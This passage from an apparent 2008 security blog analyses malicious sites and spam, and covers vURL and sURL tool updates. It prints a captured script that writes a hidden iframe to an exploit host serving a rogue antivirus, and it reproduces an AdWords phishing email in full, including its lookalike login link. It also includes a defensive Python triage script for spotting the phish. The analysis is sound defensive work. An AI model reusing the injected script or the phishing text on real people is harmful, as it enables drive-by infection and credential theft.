Connie also submitted one of these for inclusion in hpHosts toward the end of August, and further analysis saw the domain being led to, changing from time to time, before it finally pointed back to itself;

http://forum.hosts-file.net/viewtopic.php?p=4945#p4945

In all cases however, both old and new, the final result was the exploit attempting to peddle the now well known rogue, AntivirusXP. See the following for an example;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.19ssl.net/script.js
Server IP: 84.157.239.55 [ p549DEF37.dip.t-dialin.net ]
        > 12.202.254.90 [ 12-202-254-90.client.mchsi.com ]
        > 76.104.72.250 [ c-76-104-72-250.hsd1.va.comcast.net ]
        > 24.1.175.116 [ c-24-1-175-116.hsd1.il.comcast.net ]
        > 200.165.57.31 [ Resolution failed ]
        > 75.49.217.223 [ adsl-75-49-217-223.dsl.emhril.sbcglobal.net ]
        > 121.170.44.90 [ Resolution failed ]
        > 87.116.180.136 [ cable-87-116-180-136.dynamic.sbb.rs ]
        > 69.37.33.66 [ JERRY_DESK ]
        > 71.193.25.70 [ c-71-193-25-70.hsd1.ca.comcast.net ]
        > 76.170.105.146 [ cpe-76-170-105-146.socal.res.rr.com ]
        > 70.218.74.127 [ 127.sub-70-218-74.myvzw.com ]
        > 68.80.34.22 [ c-68-80-34-22.hsd1.pa.comcast.net ]
        > 12.203.121.61 [ 12-203-121-61.client.mchsi.com ]
        > 79.179.170.191 [ bzq-79-179-170-191.red.bezeqint.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
Date: 08 September 2008
Time: 23:16:15:16
*****************************************************************
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}


vURL Online:
http://vurl.mysteryfcm.co.uk/?url=http://www.19ssl.net/script.js&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on

... and not surprisingly, almost all of the newer ones I've spotted have used fastflux. Oh and nope, the "NESCO Accounting and Finance" displayed on all of the resulting sites' homepages isn't real either ;o)

Sunday, 7 September 2008

OH NOES! My AdWords adverts aren't .... hang on a second!

It would seem an account I never had has adverts that I've never set up, not being run. Oh dear, some silly scammer hasn't done their homework again (no surprise there then, these things aren't exactly targeted at specific people, they're just randomly spammed out).

The latest AdWords scam I've received is thus;


Exported by: Outlook Export v0.1.2


From: AdWords-NoReplay
E-mail:adwords-noreply@google.com [ 64.233.167.99 - py-in-f99.google.com ]
Date: 08/09/2008 09:51:36
Subject: Your ads are not running.
**************************************************************************
Links
**************************************************************************

Link: https://adwords.google.com/select/images/adwords_home/new_logogif
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: http://adwords.google.com/select
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: http://www.adwords.google.com.coisfon.cn/select/Login
        Domain: www.adwords.google.com.coisfon.cn
        IP: 87.69.85.21 [ Resolution failed ]
        hpHosts Status: Not Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: https://adwords.google.com/support/?hl=en_GB
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<https://adwords.google.com/select/images/adwords_home/new_logogif>

Hello,

Our attempt to charge your credit card for your outstanding Google AdWords account balance was declined. Your account is still open. However, your ads have been suspended. Once we are able to charge your card and receive payment for your account
balance, we will re-activate your ads.

Please update your billing information, even if you plan to use the same credit card. This will trigger our billing system to try charging your card again. You do not need to contact us to reactivate your account.

To update your primary payment information, please follow these steps:

1. Log in to your account at http://adwords.google.com/select <http://www.adwords.google.com.coisfon.cn/select/Login> .
2. Enter your new or updated billing information.
6. Click 'Update' when you have finished.

In the future, you may wish to use a backup credit card in order to help ensure continuous delivery of your ads. You can add a backup credit card by visiting your Billing Preferences page or visit the AdWords Help Centre for more details:
https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB

Thank you for advertising with Google AdWords. We look forward to providing you with the most effective advertising available.

Sincerely,

The Google AdWords Team

---------------------------
This message was sent from a notification-only email address that does not accept incoming email. Please do not reply to this message. If you have any questions, please visit the Google AdWords Help Centre at https://adwords.google.com/support/?hl=en_GB to find answers to frequently asked questions and a 'contact us' link near the bottom of the page.
-----------------------------

**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="https://adwords.google.com/select/images/adwords_home/new_logogif">https://adwords.google.com/select/images/adwords_home/new_logogif</A>><BR>
<BR>
Hello,<BR>
<BR>
Our attempt to charge your credit card for your<BR>
outstanding Google AdWords account balance was declined.<BR>
Your account is still open. However, your ads have been suspended. Once<BR>
we are able to charge your card and receive payment for your account<BR>
balance, we will re-activate your ads.<BR>
<BR>
Please update your billing information, even if you plan to use the<BR>
same credit card. This will trigger our billing system to try charging<BR>
your card again. You do not need to contact us to reactivate your<BR>
account.<BR>
<BR>
To update your primary payment information, please follow these steps:<BR>
<BR>
1. Log in to your account at <A HREF="http://adwords.google.com/select">http://adwords.google.com/select</A> <<A HREF="http://www.adwords.google.com.coisfon.cn/select/Login">http://www.adwords.google.com.coisfon.cn/select/Login</A>> .<BR>
2. Enter your new or updated billing information.<BR>
6. Click 'Update' when you have finished.<BR>
<BR>
In the future, you may wish to use a backup credit card in order to<BR>
help ensure continuous delivery of your ads. You can add a backup<BR>
credit card by visiting your Billing Preferences page or visit the<BR>
AdWords Help Centre for more details:<BR>
<A HREF="https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB">https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB</A><BR>
<BR>
<BR>
<BR>
Thank you for advertising with Google AdWords. We look forward to<BR>
providing you with the most effective advertising available.<BR>
<BR>
Sincerely,<BR>
<BR>
The Google AdWords Team<BR>
<BR>
---------------------------<BR>
This message was sent from a notification-only email address that does<BR>
not accept incoming email. Please do not reply to this message. If you<BR>
have any questions, please visit the Google AdWords Help Centre at<BR>
<A HREF="https://adwords.google.com/support/?hl=en_GB">https://adwords.google.com/support/?hl=en_GB</A> to find answers to<BR>
frequently asked questions and a 'contact us' link near the bottom of<BR>
the page.<BR>
-----------------------------<BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <fleshpots@yahoo.com>
Delivered-To: services@[REMOVED]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
        by smtp-in-125.livemail.co.uk (Postfix) with SMTP id BE78B534184
        for <services@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from smtp-in-115.livemail.co.uk (smtp-in-115.livemail.co.uk [213.171.216.115])
        by smtp-in-125.livemail.co.uk (Postfix) with ESMTP id AB5F453418A
        for <ceo@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
        by smtp-in-115.livemail.co.uk (Postfix) with SMTP id 9109D327452
        for <abuse@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from [75.91.2.27] (h27.2.91.75.dynamic.ip.windstream.net [75.91.2.27])
        by smtp-in-115.livemail.co.uk (Postfix) with ESMTP id 55EB2327452
        for <abuse@[REMOVED]>; Mon, 8 Sep 2008 09:51:17 +0100 (BST)
Received: from [75.91.2.27] by f.mx.mail.yahoo.com; Mon, 8 Sep 2008 03:51:36 -0500
To: <abuse@[REMOVED]>
Subject: Your ads are not running.
Date: Mon, 8 Sep 2008 03:51:36 -0500
Message-ID: <01c91166$30cf5400$1b025b4b@fleshpots>
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0CCC_01C91166.30CF5400"
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AcgJyLD6O6KP8W7HVNC719G7XNH9M4==
Content-Language: us
From: "AdWords-NoReplay" <adwords-noreply@google.com>
X-Original-To: abuse@[REMOVED]


Also not surprising is that the scammy site itself (www.adwords.google.com.coisfon.cn) is running on a fastflux;




Ref:
http://hosts-file.net/?s=www.adwords.google.com.coisfon.cn

So what does the phishing page itself look like?



vURL Online results for this site:
http://vurl.mysteryfcm.co.uk/?url=http://www.adwords.google.com.coisfon.cn/select/Login/&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on
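
An added example covering both this AdWords phish and the Facebook worm mail above (not part of either post): a Python triage that does what a reader of those headers does by hand. It compares the HELO name with the name the receiving MTA resolved in each Received line, compares the Return-Path domain with the From domain, and picks out links whose host embeds the sender's domain but is registered somewhere else (adwords.google.com.coisfon.cn when the mail claims to be from google.com). The two messages are constructed from the headers and lines quoted above with the recipient replaced by example.net; registrable_domain() uses the last two labels as a stand-in for a Public Suffix List lookup, which is an approximation.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed messages, cut down from the two mails quoted above (recipient
# replaced with example.net, bodies reduced to the lines that matter).
SAMPLE_FACEBOOK = """\
Return-Path: <confirm-r16xa@facebookmail.com>
Received: from facebookmail.com (mail.squires.co.za [196.37.170.133])
\tby smtp-in-123.livemail.co.uk (Postfix) with ESMTP id D206F5DE96E
\tfor <services@example.net>; Wed, 10 Sep 2008 09:17:13 +0100 (BST)
From: confirm-r16xa@facebookmail.com
To: services@example.net
Subject: An old friend added you as a friend on facebook

To see her picture please check your attachment.
"""

SAMPLE_ADWORDS = """\
Return-Path: <fleshpots@yahoo.com>
Received: from [75.91.2.27] (h27.2.91.75.dynamic.ip.windstream.net [75.91.2.27])
\tby smtp-in-115.livemail.co.uk (Postfix) with ESMTP id 55EB2327452
\tfor <abuse@example.net>; Mon, 8 Sep 2008 09:51:17 +0100 (BST)
From: "AdWords-NoReplay" <adwords-noreply@google.com>
To: <abuse@example.net>
Subject: Your ads are not running.

1. Log in to your account at http://adwords.google.com/select <http://www.adwords.google.com.coisfon.cn/select/Login> .
https://adwords.google.com/support/?hl=en_GB
"""

# "from <HELO name> (<reverse DNS> [<ip>])" as Postfix writes it
RECEIVED_FROM = re.compile(r"^from\s+(\S+)\s+\(([^\s\[\]]+)?\s*\[([\d.]+)\]\)", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"']+")

def registrable_domain(host):
    """Last two labels of a host name. Assumption: a stand-in for a Public
    Suffix List lookup; wrong for co.uk-style suffixes, right for .cn and .com."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def helo_mismatches(msg):
    """Hops whose HELO name is not the name the receiving MTA resolved for the peer."""
    hits = []
    for value in msg.get_all("Received", []):
        m = RECEIVED_FROM.match(" ".join(value.split()))   # unfold the header first
        if not m:
            continue
        helo, rdns = m.group(1).lower(), (m.group(2) or "").lower()
        if helo != rdns and not rdns.endswith("." + helo):
            hits.append((m.group(1), m.group(2) or "", m.group(3)))
    return hits

def lookalike_links(body, brand_domain):
    """URLs whose host contains the sender's domain but is registered elsewhere."""
    out = []
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        if brand_domain in host and registrable_domain(host) != brand_domain:
            out.append(url)
    return out

def triage(raw):
    """Run the three header/body checks over one RFC 822 message."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    envelope_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    body = msg.get_payload() if not msg.is_multipart() else ""
    return {
        "helo_mismatch": helo_mismatches(msg),
        "envelope_mismatch": envelope_domain != from_domain,
        "lookalike_links": lookalike_links(body, from_domain),
    }

if __name__ == "__main__":
    for name, raw in (("facebook", SAMPLE_FACEBOOK), ("adwords", SAMPLE_ADWORDS)):
        print(name, triage(raw))
```

The Facebook mail passes the envelope and link checks (facebookmail.com is a plausible sender domain and the body has no links), so the HELO check is the one that exposes it: a host in South Africa introducing itself as facebookmail.com. The AdWords mail fails all three.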

vURL Online updated .... again

I've just done another quick update to vURL Online .... this time, I've added options to enable/disable;

1. Parsing links
2. Displaying source code
3. Checking blacklists

Still to come is an option to select the country that vURL should identify itself as coming from. This option is to be provided to allow for bypassing those malicious servers that use Geo-tracking to determine whether or not to serve exploit-X, exploit-Y or some-other-random-content.

I'm currently looking for non-UK servers to host the proxy script required for this. If you'd like to host a copy of the script, please do let me know. All the script has to do is;

1. Accept URL and User agent params using GET (NOT POST!!) request
2. Return site content

Nothing more complex than that.

Announcement, Support & Feedback:
http://forum.hosts-file.net/viewtopic.php?f=42&t=711

Visit vURL Online:
http://vurl.mysteryfcm.co.uk

Thursday, 4 September 2008

sURL Service bug fixes

I came across a couple bugs that have now been fixed;

1. Title is not always extracted
2. hpHosts status shown as listed when sURL target does not contain http:// *

* All sURL's should have the protocol prefix, and I could've sworn I'd put in checks for this, but had apparently not ......

Ref:
http://surl.co.uk/?7955

To be perfectly honest, the sURL site is in dire need of a complete re-write, but time is short atm, so that's gonna have to wait for now.

If you find any other problems with the sURL service, please do let me know.

Ref:
http://forum.hosts-file.net/viewtopic.php?f=41&t=707